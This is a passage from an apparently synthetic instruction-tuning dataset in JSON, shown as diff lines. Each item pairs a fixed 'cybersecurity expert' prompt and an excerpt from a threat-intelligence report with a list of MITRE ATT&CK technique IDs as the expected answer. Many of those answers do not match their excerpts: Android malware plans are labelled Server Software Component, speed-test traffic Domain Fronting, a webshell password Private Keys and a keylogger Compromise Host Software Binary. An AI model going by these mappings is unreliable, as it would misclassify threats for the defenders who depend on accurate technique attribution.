description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The first spear phish from group \u201cAdmin@338\u201d was sent to a foreign government in the Asian Pacific region on March 10, 2014 \u2013 just two days after the flight disappeared. The threat actors sent a spear-phishing email with an attachment titled, \u201cMalaysian Airlines MH370.doc\u201d (MD5: 9c43a26fe4538a373b7f5921055ddeae). Although threat actors often include some sort of \u201cdecoy content\u201d upon successful exploitation (that is, a document representing what the recipient expected to open), in this case, the user is simply shown a blank document.", + "output": "- T1566: Phishing\n- T1566.001: Phishing - Spearphishing Attachment\n- T1203: Exploitation for Client Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "However, for version 3 things are different.\u00a0 This is how the report of the email_accounts_grabber module appears for Emotet version 3:", + "output": "- T1586.002: Compromise Accounts - Email Accounts\n- T1588.001: Obtain Capabilities - Malware\n- T1129: Shared Modules" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT3\u00a0(also known as UPS), the actors responsible for\u00a0Operation Clandestine Fox\u00a0has quietly continued to send waves of spearphishing messages over the past few months. This actor initiated their most recent campaign on November 19, 2014 targeting multiple organizations. The attacker leveraged multiple exploits, targeting both\u00a0CVE-2014-6332\u00a0and\u00a0CVE-2014-4113. CVE-2014-6332 was disclosed publicly on 2014-11-11 and is a Windows OLE Automation Array Remote Code Execution vulnerability. CVE-2014-4113 is a privilege escalation vulnerability that was\u00a0disclosed publicly on 2014-10-14.", + "output": "- T1534: Internal Spearphishing\n- T1587.004: Develop Capabilities - Exploits\n- T1566.003: Phishing - Spearphishing via Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In March, we discovered a targeted campaign to distribute Milum, a Trojan designed to gain remote control of devices in target organizations, some of which operate in the industrial sector. The first signs of this operation, which we have dubbed WildPressure, can be traced back to August 2019; still, the campaign remains active. The Milum samples we have seen so far do not share any code similarities with any known APT campaigns. The malware provides attackers with remote control over infected devices, allows downloading and executing commands, collecting and exfiltrating information and installing upgrades in the malware.", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We did not observe the initial access for this case but assess with medium to high confidence that a malicious email campaign was used to deliver an Excel (xls) document. Following the opening of the xls document, the initial Qbot DLL loader was downloaded and saved to disk. Interestingly, the name of the DLL contained a .html extension to disguise the portable executable nature of the payload. Once executed, the Qbot process creates a scheduled task to elevate itself to system.", + "output": "- T1204.002: User Execution - Malicious File\n- T1566.002: Phishing - Spearphishing Link\n- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Although there are no previously known malicious Android applications attributed to the StrongPity group, we strongly believe that the threat actor is in the process of actively developing new malicious components that can be used to target Android platforms.", + "output": "- T1505: Server Software Component" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SHA256 file hashes for 119 malspam attachments, 30 extracted Redaman executable files, and 30 dropped Redaman DLL files found from September through December 2018. Information is available at: https://github.com/pan-unit42/iocs/blob/master/Redaman_banking_malware/2018-09-thru-2018-12-file-hashes-for-Redaman-banking-malware.txt .", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment\n- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "According to our research partner in Japan, the original EvilPost attack in December 2015 arrived as a spear-phishing email with a Word document attached.", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment\n- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In early April, Emotet acquired a module for distribution over wireless networks (MD5: 75d65cea0a33d11a2a74c703dbd2ad99), which tried to access Wi-Fi using a dictionary attack. Its code resembled that of the Network Spreader module (bypass.exe), which had been supplemented with Wi-Fi connection capability. If the brute-force was successful, the module transmitted data about the network to C&C.", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We investigated a long-running espionage campaign, dubbed A41APT, targeting multiple industries, including the Japanese manufacturing industry and its overseas bases, which has been active since March 2019. The attackers used vulnerabilities in an SSL-VPN product to deploy a multi-layered loader we dubbed Ecipekac (aka DESLoader, SigLoader and HEAVYHAND). We attribute this activity to APT10 with high confidence. Most of the discovered payloads deployed by this loader are fileless and have not been seen before. We observed SodaMaster (aka DelfsCake, dfls and DARKTOWN), P8RAT (aka GreetCake and HEAVYPOT), and FYAnti (aka DILLJUICE Stage 2) which in turn loads QuasarRAT. In November and December 2020, two public blog posts were published about this campaign. One month later, we observed new activities from the actor with an updated version of some of their implants designed to evade security products and make analysis harder for researchers. You can read more in our public report.", + "output": "- T1588.001: Obtain Capabilities - Malware\n- T1588.006: Obtain Capabilities - Vulnerabilities" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Along with the HTTP part, the binary part was also updated. The encryption remained the same, but Emotet dropped Google Protocol Buffer and switched to its own format. The compression algorithm also changed, with zlib replaced by liblzf. More details about the new protocol can be found in the Threat Intel and CERT Polska reports.", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In November 2018, Cisco Talos published research on an attack campaign named DNSpionage. It involved attacks using malware to compromise individual endpoints, but most interestingly described an effort to specifically hijack DNS entries of government organizations to redirect visitors to likely malicious, adversary operated systems. Both FireEye and Crowdstrike followed up with their own assessments for the DNS hijacking efforts, and described operations extending back to January 2017. No attribution to any known adversary groups was provided, other than that the target radius was primarily in the Middle East and the adversary was also likely operating out of that region. ", + "output": "- T1496: Resource Hijacking\n- T1584.002: Compromise Infrastructure - DNS Server\n- T1189: Drive-by Compromise\n- T1583.002: Acquire Infrastructure - DNS Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Although the targeting profile is the same as the Russian banking cluster, the TTPs are very different. In particular, the use of tooling stands out from other clusters of CARBON SPIDER activity. As with other clusters, the primary infection vector is targeted spear phishing emails that use exploits for a variety of vulnerabilities in Microsoft Office:", + "output": "- T1588.006: Obtain Capabilities - Vulnerabilities\n- T1566: Phishing\n- T1203: Exploitation for Client Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Function similarity \u2013 Important functions in both BYEBY and wincore.dll have almost the same implementation. One such function is the payloads\u2019 main thread function.", + "output": "- T1588.001: Obtain Capabilities - Malware\n- T1055.003: Process Injection - Thread Execution Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Another indicator of a Qakbot infection is HTTPS traffic to cdn.speedof[.]me. The domain speedof[.]me is used by a legitimate Internet speed test service. Although this is not malicious traffic, we frequently see traffic to cdn.speedof[.]me during Qakbot infections. Figure 20 shows this activity from our pcap.", + "output": "- T1090.004: Proxy - Domain Fronting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Malicious use of Responder was first publicly documented on August 11, 2017 as being used by APT28, also known as Fancy Bear. The tool was used against hotel visitors to spoof NetBios resources. Victims were coerced into connecting to UDP port 137 and disclosing credentials over SMB to APT28, which the threat actor then used to gain elevated access to the network.", + "output": "- T1021.002: Remote Services - SMB/Windows Admin Shares\n- T1043: Commonly Used Port\n- T1557.001: Adversary-in-the-Middle - LLMNR/NBT-NS Poisoning and SMB Relay" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Next we compared the codebase for setting registry keys. The code reuse displayed in Figure 4 is the sequence that sets the IEHarden registry keys and other keys used throughout TidePool and Operation Ke3chang malware.", + "output": "- T1112: Modify Registry\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Another infamous banker Trojan, Kronos, caught up with Edge in 2016. We checked out its capabilities on a Windows 10 virtual machine. In the code of the new Kronos version we found a function that checks the name and checksum of a process, as well as the hashes of the functions hooked by the malware.", + "output": "- T1056.004: Input Capture - Credential API Hooking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CARROTBALL, initially discovered in an attack during October 2019, is a simple FTP downloader utility which facilitates the installation of SYSCON, a full-featured Remote Access Trojan (RAT) which leverages FTP for Command and Control (C2). It was found embedded in a malicious Word document sent as a phishing lure to a US government agency and two non-US foreign nationals professionally associated with North Korea.", + "output": "- T1059: Command and Scripting Interpreter\n- T1566: Phishing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The success of the Dropping Elephant group is striking given that no zero-day exploits or advanced techniques were used to target high-profile victims \u2013 it\u2019s clear that by applying security updates and improving the security awareness of staff, the success of attacks like this can be prevented. At the start of the year we predicted that APT groups would invest less effort in developing sophisticated tools and make greater use of off-the-shelf malware. Dropping Elephant provides a further example of how low investment and use of ready-made toolsets can be very effective when combined with high quality social engineering.", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In early 2015, a new Emotet modification was released, not all that different from the previous one. Among the changes were: new built-in public RSA key, most strings encrypted, ATS scripts for web injection cleared of comments, targets included clients of Swiss banks.", + "output": "- T1592.004: Gather Victim Host Information - Client Configurations" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A C&C address (103.82.52[.]18) which was found in one of MosaicRegressor\u2019s variants (MD5:3B58E122D9E17121416B146DAAB4DB9D) was observed in use by the \u2018Winnti umbrella and linked groups\u2019, according to a publicly available report. Since this is the only link between our findings and any of the groups using the Winnti backdoor, we estimate with low confidence that it is indeed responsible for the attacks.", + "output": "- T1587.001: Develop Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Both MPK variants include key loggers that are extremely similar in functionality in addition to having the same strings used for headers within the key log file. The MPK IRC Bot monitors active application windows and writes the title of the open window along with the logged keystrokes to a file at \u201c%temp%\\Save.tmp\u201d. The MPK Trojan also monitors specifically for windows that are likely to contain login forms for popular web-based email clients, such as titles that contain:", + "output": "- T1554: Compromise Host Software Binary" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "AveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. In fact, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. Since the beginning of 2019, we have collected more than 1300 samples and extracted more than 130 C2s.", + "output": "- T1587.001: Develop Capabilities - Malware\n- T1114: Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": ". . MuddyWater has conducted various campaigns against entities spread throughout the U.S.A, Europe, Middle East and South Asia.. . A typical TTP employed by the group is the heavy use of scripting in their infection chains using languages like PowerShell and Visual Basic coupled with the frequent use of living-of-the-land binaries (LoLBins).. . Cisco Talos recently observed a campaign operated by MuddyWater targeting users in Turkey. This campaign consists of the use of malicious PDFs and Microsoft Office documents (maldocs) to serve as the initial infection vector. These maldocs were named in such a way as to masquerade as legitimate documents from the Turkish Health and Interior Ministries.. . Next, the malware executes a series of scripts deployed on the infected endpoint to serve as downloaders and instrumentors for additional payloads.. . We've also discovered the use of flags or tokens in attacks conducted by this threat actor in this campaign. These tokens are meant to signal a successful infection of a target by the group's malicious artifacts.. . . . ", + "output": "- T1203: Exploitation for Client Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Pony is a popular downloader program that can download additional malware onto the infected system. It is also equipped with a number of plugins that may be used to steal stored credentials for various applications such as FTP clients, web browsers, email clients, and other software. Pony is also commonly known as Fareit.", + "output": "- T1555: Credentials from Password Stores\n- T1539: Steal Web Session Cookie" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We determined the string in the pre tags is the actor provided password, which the webshell uses as a key to decrypt the embedded payload. We determined this by following the process in which the TwoFace++ loader webshell uses the actor provided password to authenticate and decrypt the embedded webshell:", + "output": "- T1552.004: Unsecured Credentials - Private Keys" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We found a Coinminer bundled with the legitimate installer of video conferencing app Zoom, luring users who want to install the software but end up unwittingly downloading a malicious file. The compromised files are not from Zoom\u2019s official download center, and are assumed to come from fraudulent websites. We have been working with Zoom to ensure that they are able to communicate this to their users appropriately.", + "output": "- T1195.002: Supply Chain Compromise - Compromise Software Supply Chain\n- T1554: Compromise Host Software Binary\n- T1588.001: Obtain Capabilities - Malware\n- T1574.005: Hijack Execution Flow - Executable Installer File Permissions Weakness" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In August 2019, FireEye released the \u201cDouble Dragon\u201d report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponzing and exploiting within a matter of days.", + "output": "- T1595.002: Active Scanning - Vulnerability Scanning\n- T1046: Network Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Most modifications of Trojan.Win32.Waldek are distributed via removable media and include functionality to collect information on infected systems and send it to the attackers. Based on the system data collected, the attackers create packages of additional malware to be installed on the infected system using the relevant Waldek functionality.", + "output": "- T1543: Create or Modify System Process\n- T1005: Data from Local System\n- T1025: Data from Removable Media\n- T1091: Replication Through Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LockBit 2.0 is known for its extortion tactics, encrypting devices and demanding a ransom", + "output": "- T1588.001: Obtain Capabilities - Malware\n- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Vidar can also receive settings from the C&C that tells it exactly what to do.", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The threat actor used RDP on Active Directory using leaked accounts. The actor dropped scanning tools, Nmap.exe and Nping.exe, for scanning the network. Next, the scheduled task was pushed by the group policy domain machine.", + "output": "- T1484: Domain or Tenant Policy Modification\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "An attacker sends an e-mail with a malicious Tar archive attached.", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment\n- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "QAKBOT can use VBS to download and execute malicious files", + "output": "- T1588.001: Obtain Capabilities - Malware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The PHP malware achieves persistence by adding scheduled tasks on the host to execute daily and at regular intervals. At the same time, a generated TMP file runs a parallel process to launch the stealer component.", + "output": "- T1053: Scheduled Task/Job\n- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Uses PowerShell to retrieve the malicious payload and download additional resources such as Mimikatz and Rclone.", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1588.002: Obtain Capabilities - Tool" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The observed attack technique (OAT) detection indicates that the php-cgi process represents a \u201c/bin/bash\u201d shell\u201dand is directly reading \u201cpasswd\u201d, suggesting that the server might have been compromised", + "output": "- T1059.004: Command and Scripting Interpreter - Unix Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge 